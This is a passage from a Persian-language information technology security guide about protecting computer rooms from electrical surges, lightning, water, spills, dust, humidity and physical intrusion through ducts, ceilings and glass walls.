‫ﻣﺘﻨﺎﻭﺏ ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺷﻮﺩ‪ .‬ﺍﻳﻦ ﭘﺎﺭﺍﺯﻳﺘﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﻓﻀﺎ ﻳﺎ ﻛﺎﺑﻠﻬﺎﻱ ﺍﻧﺘﻘﺎﻝ ﺑـﺮﻕ ﻧﺰﺩﻳـﻚ ﻣﺤﻠﺘـﺎﻥ‬
‫ﻣﻨﺘﻘﻞ ﺷﻮﻧﺪ‪.‬‬
‫ﺍﻣﻮﺍﺝ ﺍﻟﻜﺘﺮﻳﻜﻲ ﻧﻮﻉ ﺧﺎﺻﻲ ﺍﺯ ﭘﺎﺭﺍﺯﻳﺘﻬﺎﻱ ﺍﻟﻜﺘﺮﻳﻜﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺷﺎﻣﻞ ﻳﻚ ﻳﺎ ﭼﻨﺪ ﭘﺎﻟﺲ ﻭﻟﺘﺎﮊ ﺑﺎﻻ ﻣﻲﺷﻮﻧﺪ‪ .‬ﭼﻨﺎﻧﭽﻪ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺑﺎﺷﺪ ﻫﺮ‬
‫ﺭﺍﻳﺎﻧﻪ ﺑﺎﻳﺪ ﻳﻚ ﻣﺪﺍﺭ ﺍﻟﻜﺘﺮﻳﻜﻲ ﻣﺠﺰﺍ ﻭ ﻳﻚ ﺳﻴﻢ ﺯﻣﻴﻦ ﺑﺎ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﺻﺎﻓﻲ ﻗﺪﺭﺕ ﺍﻳﺰﻭﻟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺗﺤﺖ ﻫﻴﭻ ﺷﺮﺍﻳﻄﻲ‬
‫ﻲ ﺳﻨﮕﻴﻦ ﻣﺪﺍﺭ ﺍﺷﺘﺮﻛﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺭﺳﺎﻧﺎﻫﺎﻱ ﺭﺍﺩﻳﻮﻳﻲ )ﺍﺯ ﺟﻤﻠﻪ ﺗﻠﻔﻨﻬﺎﻱ ﺳﻴﺎﺭ( ﺑﺎﻳﺪ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﻭﺭ ﻧﮕﻪ ﺩﺍﺷﺘﻪ ﺷﻮﻧﺪ‪.‬‬
‫ﻧﺒﺎﻳﺪ ﺑﺎ ﻭﺳﺎﻳﻞ ﺑﺮﻗ ﹺ‬

‫ﺻﺎﻋﻘﻪ‬
‫ﺻﺎﻋﻘﻪ ﺍﻣﻮﺍﺝ ﺑﺰﺭﮒ ﺑﺮﻕ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﺪ ﻛﻪ ﺣﺘﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛﻪ ﻭﺳﺎﻳﻞ ﺣﻔﺎﻇﺖ ﺍﻟﻜﺘﺮﻳﻜﻲ ﺩﺍﺭﻧﺪ ﺭﺍ ﺧﺮﺍﺏ ﻛﻨﺪ‪ .‬ﺍﮔﺮ ﺻـﺎﻋﻘﻪ ﺑـﻪ‬
‫ﺍﺳﻜﻠﺖ ﻓﻠﺰﻱ ﺳﺎﺧﺘﻤﺎﻥ ﺷﻤﺎ ﺍﺻﺎﺑﺖ ﻛﻨﺪ )ﻳﺎ ﺑﻪ ﺑﺮﻕﮔﻴﺮ ﺁﻥ ﺑﺮﺧﻮﺭﺩ ﻧﻤﺎﻳﺪ(‪ ،‬ﺟﺮﻳﺎﻥ ﺣﺎﺻﻠﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﻣﻴﺪﺍﻥ ﻣﻐﻨﺎﻃﻴـﺴﻲ ﻗـﻮﻱ ﺩﺭ ﻣـﺴﻴﺮ‬

‫‪55‬‬ ‫‪Smoke Detector‬‬


‫‪٢٨٣‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺧﻮﺩ ﺗﺎ ﺯﻣﻴﻦ ﺍﻳﺠﺎﺩ ﻛﻨﺪ‪ .‬ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺎﻳﺪ ﺩﺭ ﺧﻼﻝ ﻃﻮﻓﺎﻧﻬﺎﻱ ﺻﺎﻋﻘﻪﺍﻱ ﺍﺯ ﭘﺮﻳﺰ ﺑﺮﻕ ﺑﻴﺮﻭﻥ ﻛـﺸﻴﺪﻩ ﺷـﻮﻧﺪ؛ ﺍﮔـﺮ ﭼﻨـﻴﻦ ﻛـﺎﺭﻱ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ‬
‫ﻧﻴﺴﺖ ﺍﺯ ﺗﺠﻬﻴﺰﺍﺕ ﺑﺎﺯﺩﺍﺭﻧﺪﺓ ﺍﻣﻮﺍﺝ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ .‬ﮔﺮﭼﻪ ﺍﻳﻦ ﻭﺳﺎﻳﻞ ﺩﺭ ﻣﻘﺎﺑﻞ ﺑﺮﺧﻮﺭﺩ ﻣﺴﺘﻘﻴﻢ ﺩﺳﺘﮕﺎﻩ ﺭﺍ ﺣﻔﺎﻇﺖ ﻧﺨﻮﺍﻫﻨـﺪ ﻛـﺮﺩ‪ ،‬ﻭﻟـﻲ‬
‫ﻭﻗﺘﻲ ﻃﻮﻓﺎﻧﻬﺎ ﺩﻭﺭ ﺑﺎﺷﻨﺪ ﻛﻤﻚ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻭﺍﺳﻄﻪﻫﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﺑﺎﻳﺪ ﺣﺘﻲﺍﻻﻣﻜﺎﻥ ﺍﺯ ﺳﺎﺯﺓ ﻓﻠـﺰﻱ ﺳـﺎﺧﺘﻤﺎﻥ ﺩﻭﺭ ﻧﮕـﺎﻩ ﺩﺍﺷـﺘﻪ ﺷـﻮﻧﺪ‪.‬‬
‫ﻫﻴﭽﮕﺎﻩ ﺑﻴﺮﻭﻥ ﺳﺎﺧﺘﻤﺎﻥ ﺍﺯ ﻛﺎﺑﻞ ﻣﺴﻲ ﺷﺒﻜﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ‪ ،‬ﻣﮕﺮ ﺩﺍﺧﻞ ﻛﺎﻧﺎﻟﻬﺎﻱ ﻓﻠﺰﻱ‪.‬‬

‫ﺁﺏ‬
‫ﺁﺏ ﻣﻲﺗﻮﺍﻧﺪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺭﺍ ﻧﺎﺑﻮﺩ ﻛﻨﺪ‪ .‬ﺍﻭﻟﻴﻦ ﺧﻄﺮ ﺍﺗﺼﺎﻝ ﻛﻮﺗﺎﻩ ﺍﻟﻜﺘﺮﻳﻜﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭﺻﻮﺭﺗﻲ ﭘﻴﺶ ﺧﻮﺍﻫـﺪ ﺁﻣـﺪ ﻛـﻪ ﺁﺏ ﻣﻴـﺎﻥ ﺧﻄـﻮﻁ‬
‫ﺣﺎﻭﻱ ﻭﻟﺘﺎﮊ ﻭ ﻳﻚ ﺧﻂ ﺍﻧﺘﻘﺎﻝ ﺯﻣﻴﻦ ﺻﻔﺤﺔ ﻣﺪﺍﺭ‪ ،‬ﺍﺗﺼﺎﻝ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ‪.‬‬
‫ﻻ ﺍﺯ ﺑﺎﺭﺍﻥ ﻳﺎ ﺳﻴﻞ ﻭ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺁﺑﭙﺎﺵ ﻗﻄﺮﻩﺍﻱ ﻛﻪ ﺍﺯ ﮐﻨﺘﺮﻝ ﺧﺎﺭﺝ ﻣﻲﺷﻮﻧﺪ ﺟﺎﺭﻱ ﻣﻲﮔـﺮﺩﺩ‪ .‬ﺁﺏ ﻫﻤﭽﻨـﻴﻦ‬ ‫ﺁﺏ ﻣﻌﻤﻮ ﹰ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﺟﺎﻫﺎﻱ ﻋﺠﻴﺐ ﻭ ﻏﺮﻳﺐ ﻣﺎﻧﻨﺪ ﺳﺮﺭﻳﺰ ﺩﺳﺘﺸﻮﺋﻲﻫﺎ ﺩﺭ ﻃﺒﻘﺎﺕ ﺑﺎﻻﺗﺮ‪ ،‬ﻳﺎ ﺑﺮ ﺍﺛﺮ ﺧﺮﺍﺑﻜﺎﺭﻱﻫﺎ‪ ،‬ﻭ ﻳﺎ ﺍﺯ ﺩﭘﺎﺭﺗﻤﺎﻥ ﺁﺗﺶﻧـﺸﺎﻧﻲ‬
‫ﺟﺮﻳﺎﻥ ﭘﻴﺪﺍ ﻛﻨﺪ‪.‬‬

‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺍﺯ ﻃﺒﻘﺎﺕ ﺯﻳﺮﺯﻣﻴﻦ ﻛﻪ ﺩﺭ ﻣﻌﺮﺽ ﺳﻴﻼﺏ ﻫﺴﺘﻨﺪ ﺑﻴﺮﻭﻥ ﺁﻭﺭﻳﺪ‪ .‬ﺣﺴﮕﺮﻫﺎﻱ ﺁﺏ ﺭﺍ ﺭﻭﻱ ﺯﻣﻴﻦ ﻃﺒﻘﻪﺍﻱ ﻛﻪ ﺳﺎﻟﻨﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ‬
‫ﺩﺭ ﺁﻥ ﻫﺴﺖ ﻭ ﻫﻤﭽﻨﻴﻦ ﺯﻳﺮ ﻃﺒﻘﺎﺕ ﭘﻠﻪﺍﻱ ﻧﺼﺐ ﻛﻨﻴﺪ ﻭ ﺍﺯ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﻗﻄﻊ ﺍﺗﻮﻣﺎﺗﻴﻚ ﺑﺮﻕ ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺳﻴﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪.‬‬

‫ﻏﺬﺍ ﻭ ﻧﻮﺷﻴﺪﻧﻲﻫﺎ‬
‫ﻏﺬﺍﻫﺎ ﺑﻮﻳﮋﻩ ﻏﺬﺍﻫﺎﻱ ﭼﺮﺏ ﺑﻪ ﺍﻧﮕﺸﺘﺎﻥ ﺍﻓﺮﺍﺩ ﻣﻲﭼﺴﺒﻨﺪ ﻭ ﺍﺯ ﺁﻧﺠﺎ ﺑﻪ ﻫﺮﭼﻪ ﻛﻪ ﻓﺮﺩ ﺑﻪ ﺁﻥ ﺩﺳﺖ ﻣﻲﺯﻧﺪ ﻣﻨﺘﻘﻞ ﻣـﻲﺷـﻮﻧﺪ‪ .‬ﺍﻳـﻦ ﺍﺗﻔـﺎﻕ‬
‫ﻏﺎﻟﺒﹰﺎ ﺳﻄﻮﺡ ﺣﺴﺎﺱ ﻧﺴﺒﺖ ﺑﻪ ﻛﺜﻴﻔﻲ ﻣﺎﻧﻨﺪ ﻧﻮﺍﺭﻫﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﻭ ﺩﻳﺴﻜﻬﺎﻱ ﻧﻮﺭﻱ ﺭﺍ ﻧﻴﺰ ﺷﺎﻣﻞ ﻣﻲﺷﻮﺩ‪ .‬ﻳﻜﻲ ﺍﺯ ﺳﺮﻳﻌﺘﺮﻳﻦ ﺭﻭﺷـﻬﺎﻱ‬
‫ﺍﺯ ﻛﺎﺭ ﺍﻧﺪﺍﺧﺘﻦ ﻳﻚ ﺻﻔﺤﻪ ﻛﻠﻴﺪ ﺭﻭﻣﻴﺰﻱ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻳﻚ ﻧﻮﺷﻴﺪﻧﻲ ﻏﻴﺮ ﺍﻟﻜﻠﻲ ﻳﺎ ﻳﻚ ﻓﻨﺠﺎﻥ ﻗﻬﻮﻩ ﺭﻭﻱ ﺩﻛﻤﻪﻫﺎﻱ ﺁﻥ ﺭﻳﺨﺘﻪ ﺷـﻮﺩ‪.‬‬
‫‪٥٦‬‬
‫ﺩﺭ ﺣﺎﻟﺖ ﻛﻠﻲ ﺳﺎﺩﻩﺗﺮﻳﻦ ﻗﺎﻋﺪﻩ ﺍﻳﻤﻦﺗﺮﻳﻦ ﻫﻢ ﻫﺴﺖ‪ :‬ﻫﻤﺔ ﻏﺬﺍﻫﺎ ﻭ ﻧﻮﺷﺎﺑﻪﻫﺎ ﺭﺍ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺧﻮﺩ ﺩﻭﺭ ﻧﮕﻬﺪﺍﺭﻳﺪ‪.‬‬

‫ﺳﺎﻳﺮ ﺧﻄﺮﺍﺕ ﻣﺤﻴﻄﻲ‬


‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺧﻄﺮﺍﺕ ﻣﺤﻴﻄﻲ ﺩﻳﮕﺮﻱ ﻧﻴﺰ ﺑﻮﺟﻮﺩ ﺑﻴﺎﻳﻨﺪ‪:‬‬
‫• ﮔﺮﺩ ﻭ ﻏﺒﺎﺭ ‪ -‬ﺗﺎ ﺁﻧﺠﺎ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﺎﻟﻨﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﮔﺮﺩ ﻭ ﻏﺒﺎﺭ ﺗﻤﻴﺰ ﻧﮕﻪ ﺩﺍﺭﻳﺪ‪ ،‬ﻭ ﺍﺯ ﻳﻚ ﺟﺎﺭﻭ ﺑﺮﻗـﻲ ﻣﺨـﺼﻮﺹ‬
‫ﻛﺎﻣﭙﻴﻮﺗﺮ ﺑﺎ ﺻﺎﻓﻲ ﺑﺴﻴﺎﺭ ﺭﻳﺰ ﺩﺭ ﺑﺎﺯﻩﻫﺎﻱ ﻣﻨﻈﻢ ﺯﻣﺎﻧﻲ ﺑﺮﺍﻱ ﺗﻤﻴﺰﻛﺎﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫• ﺍﻧﻔﺠﺎﺭ ‪ -‬ﺍﮔﺮ ﻣﺠﺒﻮﺭ ﻫﺴﺘﻴﺪ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﻣﺤﻴﻄﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﺧﻄﺮ ﺍﻧﻔﺠﺎﺭ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺑﺎﻳﺪ ﻣﺤﻔﻈﻪﻫﺎﻱ ﺿﺪ ﺍﻧﻔﺠـﺎﺭ ﺭﺍ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺑﮑﺎﺭ ﺑﺮﻳﺪ‪ .‬ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻧﻴﺰ ﺑﺎﻳﺪ ﺩﺭ ﻣﺤﻔﻈﻪﻫﺎﻱ ﺿﺪ ﺍﻧﻔﺠﺎﺭ ﻭ ﻳﺎ ﺧﺎﺭﺝ ﺍﺯ ﻣﺤﻮﻃﻪ ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﻧﺪ‪.‬‬
‫• ﺣﺸﺮﺍﺕ ‪ -‬ﺑﺮﺍﻱ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻥ ﺗﻌﺪﺍﺩ ﺣﺸﺮﺍﺕ ﺩﺭ ﺳﺎﻟﻦ ﺭﺍﻳﺎﻧﻪﺗﺎﻥ ﺍﻗﺪﺍﻣﺎﺕ ﻣﺆﺛﺮ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ‪.‬‬
‫• ﻟﺮﺯﺵ ‪ -‬ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﺑﺎ ﻟﺮﺯﺵ ﺯﻳﺎﺩ‪ ،‬ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺭﻭﻱ ﻳﻚ ﺯﻳﺮﺍﻧﺪﺍﺯ ﻻﺳﺘﻴﻜﻲ ﻳﺎ ﻧﺮﻡ ﻗﺮﺍﺭﺩﻫﻴﺪ‪ ،‬ﻃﻮﺭﻱ ﻛﻪ ﺩﺭﻳﭽـﻪﻫـﺎﻱ ﺗﻬﻮﻳـﺔ‬
‫ﻫﻮﺍ ﻣﺴﺪﻭﺩ ﻧﺸﺪﻩ ﺑﺎﺷﻨﺪ‪.‬‬
‫• ﺭﻃﻮﺑﺖ ‪ -‬ﺭﻃﻮﺑﺖ ﻣﺤﻴﻂ ﺭﺍ ﻛﻨﺘﺮﻝ ﻧﻤﻮﺩﻩ ﻭ ﺩﺭ ﺳﻄﺢ ﻣﻨﺎﺳﺒﻲ ﻧﮕﺎﻩ ﺩﺍﺭﻳﺪ‪.‬‬

‫ﻛﻨﺘﺮﻝ ﻣﺤﻴﻄﻲ‬
‫ﺑﺮﺍﻱ ﺗﺸﺨﻴﺺ ﻣﺸﻜﻼﺕ ﻧﺎﺧﻮﺍﺳﺘﻪ‪ ،‬ﺑﻪ ﻃﻮﺭ ﻣﺪﺍﻭﻡ ﺩﻣﺎ ﻭ ﺭﻃﻮﺑﺖ ﻧﺴﺒﻲ ﺍﺗﺎﻕ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﻧﻈﺎﺭﺕ ﻭ ﺛﺒﺖ ﻛﻨﻴﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻗﺎﻋﺪﻩ ﻛﻠﻲ‪ ،‬ﻫـﺮ‬
‫‪ ۱۰۰۰‬ﻓﻮﺕ ﻣﺮﺑﻊ ﺍﺯ ﻓﻀﺎﻱ ﺍﺩﺍﺭﻱ ﺑﺎﻳﺪ ﺗﺠﻬﻴﺰﺍﺕ ﺛﺒﺖ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩﺵ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺁﻧﭽﻪ ﺛﺒﺖ ﻛﺮﺩﻩﺍﻳﺪ ﺭﺍ ﺩﺭ ﺑـﺎﺯﻩﻫـﺎﻱ ﺯﻣـﺎﻧﻲ‬
‫ﻣﻨﻈﻢ ﺑﺮﺭﺳﻲ ﻭ ﮔﺰﺍﺭﺵ ﻛﻨﻴﺪ‪.‬‬

‫ﺍﻳﻦ ﻗﺎﻋﺪﻩ ﺷﺎﻳﺪ ﺑﻴﺶ ﺍﺯ ﻫﺮ ﻗﺎﻋﺪﻩﺍﻱ ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺍﻫﻤﻴﺖ ﺩﺍﺭﺩ ﻛﻪ ﻏﺎﻟﺒﹰﺎ ﻫﻢ ﻧﻘﺾ ﻣﻲﺷﻮﺩ‪.‬‬ ‫‪٥٦‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٨٤‬‬

‫ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ‬


‫ﻗﻮﺓ ﺗﺸﺨﻴﺺ ﺑﻪ ﺷﻤﺎ ﺣﻜﻢ ﻣﻲﻛﻨﺪ ﺭﺍﻳﺎﻧﻪ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻳﻚ ﺍﺗﺎﻕ ﻗﻔﻞﺷﺪﻩ ﻧﮕﻬﺪﺍﺭﻳﺪ؛ ﺍﻣﺎ ﺍﻳﻦ ﺍﺗﺎﻕ ﭼﻪ ﻗﺪﺭ ﺍﻳﻤﻦ ﺍﺳﺖ؟ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﺗﺎﻗﻲ‬
‫ﻼ ﻧﺎﺍﻣﻦ ﺍﺳﺖ‪.‬‬
‫ﻛﻪ ﺑﻪ ﻧﻈﺮ ﻣﻲﺭﺳﺪ ﺍﻳﻤﻦ ﺍﺳﺖ ﺩﺭ ﻭﺍﻗﻊ ﻛﺎﻣ ﹰ‬

‫ﻛﻒﻫﺎﻱ ﭘﻠﻪﺍﻱ ﻭ ﺳﻘﻒﻫﺎﻱ ﻛﻮﺗﺎﻩ‬


‫ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺧﺘﻤﺎﻧﻬﺎﻱ ﺍﺩﺍﺭﻱ ﻣﺪﺭﻥ‪ ،‬ﺩﻳﻮﺍﺭﻫﺎﻱ ﺩﺍﺧﻠﻲ ﺍﺗﺎﻕ ﺗﺎ ﺑﺎﻻﻱ ﺳﻘﻔﻬﺎ ﻭ ﺯﻳﺮ ﻛﻔﻬـﺎ ﻧﻤـﻲﺭﺳـﻨﺪ‪ .‬ﺍﻳـﻦ ﻧـﻮﻉ ﺳـﺎﺧﺘﻤﺎﻥﺳـﺎﺯﻱ‬
‫ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﺍﺯ ﺍﺗﺎﻗﻬﺎ ﻭ ﺩﻓﺎﺗﺮ ﻣﺠﺎﻭﺭ ﺳﺎﺩﻩ ﻣﻲﻛﻨﺪ‪.‬‬

‫ﻭﺭﻭﺩ ﺍﺯ ﻃﺮﻳﻖ ﻛﺎﻧﺎﻟﻬﺎﻱ ﻫﻮﺍ‬

‫ﺍﮔﺮ ﻛﺎﻧﺎﻟﻬﺎﻱ ﻫﻮﺍﻳﻲ ﻛﻪ ﺑﻪ ﺍﺗﺎﻕ ﺭﺍﻳﺎﻧﻪ ﺷﻤﺎ ﻫﻮﺍ ﻣﻲﺭﺳﺎﻧﺪ ﺑﻪ ﺍﻧﺪﺍﺯﻩ ﻛﺎﻓﻲ ﺑﺰﺭﮒ ﺑﺎﺷﻨﺪ‪ ،‬ﻣﻬﺎﺟﻤﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﻭﺭﻭﺩ ﺑﻪ ﻣﺤﻮﻃﺔ‬
‫ﻫﺮﭼﻨﺪ ﺍﻳﻤﻦ ﺷﻤﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ .‬ﻣﺤﻴﻄﻬﺎﻳﻲ ﻛﻪ ﻧﻴﺎﺯ ﺑﻪ ﺗﻬﻮﻳﺔ ﺯﻳﺎﺩ ﻫﻮﺍ ﺩﺍﺭﻧﺪ ﺑﺎﻳﺪ ﺍﺯ ﭼﻨﺪ ﻛﺎﻧﺎﻝ ﻛﻮﭼﻚ ﻳﺎ ﻳﻚ ﻛﺎﻧﺎﻝ ﺑـﺰﺭﮒ ﻛـﻪ ﺩﺍﺭﺍﻱ‬
‫ﺗﻮﺭﻱﻫﺎﻱ ﺟﻮﺵ ﺩﺍﺩﻩ ﺷﺪﻩ ﺑﻪ ﺩﺭﻳﭽﻪﻫﺎﻱ ﻫﻮﺍ ﻳﺎ ﺩﺍﺧﻞ ﻛﺎﻧﺎﻟﻬﺎ ﻣﻲﺑﺎﺷﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ .‬ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﺑﺎ ﺍﻣﻨﻴﺖ ﺧﻴﻠﻲ ﺯﻳﺎﺩ‪ ،‬ﻣﻲﺗـﻮﺍﻥ ﺩﺭ‬
‫ﺩﺍﺧﻞ ﻛﺎﻧﺎﻟﻬﺎ ﺍﺯ ﺁﺷﻜﺎﺭﺳﺎﺯﻫﺎﻱ ﺣﺮﻛﺘﻲ ﻧﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩ‪.‬‬

‫ﺩﻳﻮﺍﺭﻫﺎﻱ ﺷﻴﺸﻪﺍﻱ‬
‫ﻻ ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﺟﻠﻮﻩ ﻣﻌﻤﺎﺭﻱ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ‪ ،‬ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺧﻄﺮﺍﺕ ﺟـﺪﻱ ﺍﻣﻨﻴﺘـﻲ‬ ‫ﮔﺮﭼﻪ ﺩﻳﻮﺍﺭﻫﺎﻱ ﺷﻴﺸﻪﺍﻱ ﻭ ﭘﻨﺠﺮﻩﻫﺎﻱ ﺑﺰﺭﮒ ﻣﻌﻤﻮ ﹰ‬
‫ﺑﺎﺷﻨﺪ‪ .‬ﺩﻳﻮﺍﺭﻫﺎﻱ ﺷﻴﺸﻪﺍﻱ ﺑﻪ ﺭﺍﺣﺘﻲ ﺷﻜﺴﺘﻪ ﻣﻲﺷﻮﻧﺪ؛ ﻳﻚ ﺁﺟﺮ ﺑﺎ ﻳﻚ ﺑﻄﺮﻱ ﺑﻨﺰﻳﻦ ﻛـﻪ ﺑـﻪ ﻃـﺮﻑ ﭘﻨﺠـﺮﻩ ﭘﺮﺗـﺎﺏ ﺷـﻮﺩ ﻣـﻲﺗﻮﺍﻧـﺪ‬
‫ﺧﺮﺍﺑﻴﻬﺎﻱ ﻗﺎﺑﻞ ﻣﻼﺣﻈﻪﺍﻱ ﺑﻪ ﺑﺎﺭ ﺁﻭﺭﺩ‪ .‬ﻳﻚ ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺳﺎﺩﮔﻲ ﺍﺯ ﻃﺮﻳﻖ ﺗﻤﺎﺷﺎﻱ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺩﺭ ﻃﺮﻑ ﺩﻳﮕﺮ ﺩﻳﻮﺍﺭ ﺷﻴﺸﻪﺍﻱ ﻳﺎ‬
‫ﭘﻨﺠﺮﻩ ﻫﺴﺘﻨﺪ ﺍﻃﻼﻋﺎﺗﻲ ﺣﻴﺎﺗﻲ ﻣﺎﻧﻨﺪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻳﺎ ﺍﻃﻼﻋﺎﺗﻲ ﺭﺍﺟﻊ ﺑﻪ ﻋﻤﻠﻜﺮﺩ ﺳﻴﺴﺘﻢ ﻛﺴﺐ ﻛﻨﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑﺘـﻮﺍﻥ‬
‫ﺍﻃﻼﻋﺎﺕ ﭘﺸﺖ ﻳﻚ ﺻﻔﺤﺔ ﻣﺎﺕ ﺭﺍ ﺑﺎ ﺗﺤﻠﻴﻞ ﺍﻣﻮﺍﺝ ﻧﻮﺭ ﺑﺎﺯﺗﺎﺑﻲ ﺁﻥ ﺑﺪﺳﺖ ﺁﻭﺭﺩ‪ .‬ﺩﻳﻮﺍﺭﻫﺎﻱ ﺷﻴﺸﻪﺍﻱ ﺩﺍﺧﻠـﻲ ﺑـﺮﺍﻱ ﺍﺗﺎﻗﻬـﺎﻳﻲ ﻛـﻪ ﺑﺎﻳـﺪ‬
‫ﺣﻔﺎﻇﺖ ﺷﻮﻧﺪ ﺍﻣﺎ ﻧﮕﻬﺒﺎﻥ ﻣﺠﺎﺯ ﺑﻪ ﻭﺭﻭﺩ ﻧﻤﻲﺑﺎﺷﺪ ﺧﻮﺏ ﻫﺴﺘﻨﺪ؛ ﺍﻣﺎ ﺩﺭ ﺗﻤﺎﻡ ﻣﻮﺍﺭﺩ ﺩﻳﮕﺮ ﺑﺎﻳﺪ ﺍﺯ ﺁﻧﻬﺎ ﺍﺟﺘﻨﺎﺏ ﻛﻨﻴﺪ‪.‬‬

‫ﺣﻔﺎﻇﺖ ﺩﺭ ﻣﻘﺎﺑﻞ ﺗﺨﺮﻳﺐ‬


‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﻫﺪﺍﻑ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﺗﺨﺮﻳﺐ ﻫﺴﺘﻨﺪ‪ .‬ﺩﻻﻳﻞ ﺗﺨﺮﻳﺐ ﻣﻲﺗﻮﺍﻧﺪ ﺷﺎﻣﻞ ﺍﻧﺘﻘﺎﻡ‪ ،‬ﺁﺷﻮﺑﻬﺎ‪ ،‬ﺍﻋﺘﺼﺎﺑﺎﺕ‪ ،‬ﺑﻴﺎﻧﻴﻪﻫﺎﻱ ﺳﻴﺎﺳﻲ‬
